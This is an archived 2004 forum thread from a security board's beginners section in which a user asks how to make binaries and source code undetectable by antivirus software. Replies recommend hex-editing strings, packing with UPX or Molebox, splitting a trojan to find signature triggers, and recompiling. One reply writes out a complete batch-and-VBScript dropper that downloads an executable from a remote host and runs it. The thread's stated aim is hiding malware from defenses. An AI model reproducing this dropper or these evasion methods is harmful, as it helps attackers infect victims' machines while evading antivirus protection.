Making Source Av Proof

GovernmentSecurity.org > System Security > Beginners Section

passi

Aug 15 2004, 07:17 PM

Hi

I know this has been asked several times but i have problems with this board's search engine

I have two questions:

1| How can i make normale binarys av proof?
2| How can i change a source code so that it is compiled not detected?

Of course I have soem information about making a app av proof and sometimes it works - but I need a better way

thank you

Partizaan

Aug 15 2004, 08:39 PM

My oppinion

1| How can i make normale binarys av proof?

- Hex edit the text strings.
- Compress with upx or molebox. With molebox you can pack the ddl in the exe.

2| How can i change a source code so that it is compiled not detected?

-Following the above. I file is tagged virus by a 'viril' string. Or how should i call it.
U got to change that string. So find in the source code what makes ik tagged as virus.

example.
ECHO Set xPost = CreateObject("Microsoft.XMLHTTP") >backup.vbs
ECHO xPost.Open "GET","http://ip/ntuser.exe",0 >>backup.vbs
ECHO xPost.Send() >>backup.vbs
ECHO Set sGet = CreateObject("ADODB.Stream") >>backup.vbs
ECHO sGet.Mode = 3 >>backup.vbs
ECHO sGet.Type = 1 >>backup.vbs
ECHO sGet.Open() >>backup.vbs
ECHO sGet.Write(xPost.responseBody) >>backup.vbs
ECHO sGet.SaveToFile "ntusers.exe",2 >>backup.vbs
ECHO Dim Partizaan >>backup.vbs
ECHO Set Partizaan = CreateObject("WScript.Shell") >>backup.vbs
ECHO Partizaan.Run "ntusers.exe" >>backup.vbs
cscript backup.vbs

This is a 'virus' ... why i have put in black what could trigger it in the source.
For binary u could use filesplitter and start splitting your trojan. Each time you got a part scan it. So keep splitting until u have a small part. Find in there the trigger for the av an change a value. Break the string. However i read a tut about it but i have doubts about it.

Lanig

Aug 15 2004, 08:58 PM

as Partizaan said with 1... you can just hex-edit or pack (i suggest molebox)
with 2... when u have the source code you could try and change variable and function names and maybe add some useless functions inside the source code, if the av doesnt find a specific data line but the exe signature, then that way should work

AgentOrange

Aug 18 2004, 05:15 PM

QUOTE (Lanig @ Aug 15 2004, 08:58 PM)

I don't belive changing the names of the code will help. The compiler is trying to make the final product as small as possable(without hurting the speed of the code, unless you tell the compiler to do so) so the final binary dosn't keep any names.

I find sometimes that if I compile the code under a differnt compiler AV's don't detect it... it depends on how old the souce code is and how many varyants have been made.

I think molebox is the way to go.

peace out

FiNaLBeTa

Aug 18 2004, 05:38 PM

read this nice article, it more theory, but nice : http://www.neworder.box.sk/newsread.php?newsid=11954

passi

Aug 19 2004, 05:38 PM

Thank you guys ^^

I will try all this things

Hope it will work ^^

/Edit: I added "Stealth Tools" as attachment. Check them out if you want

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.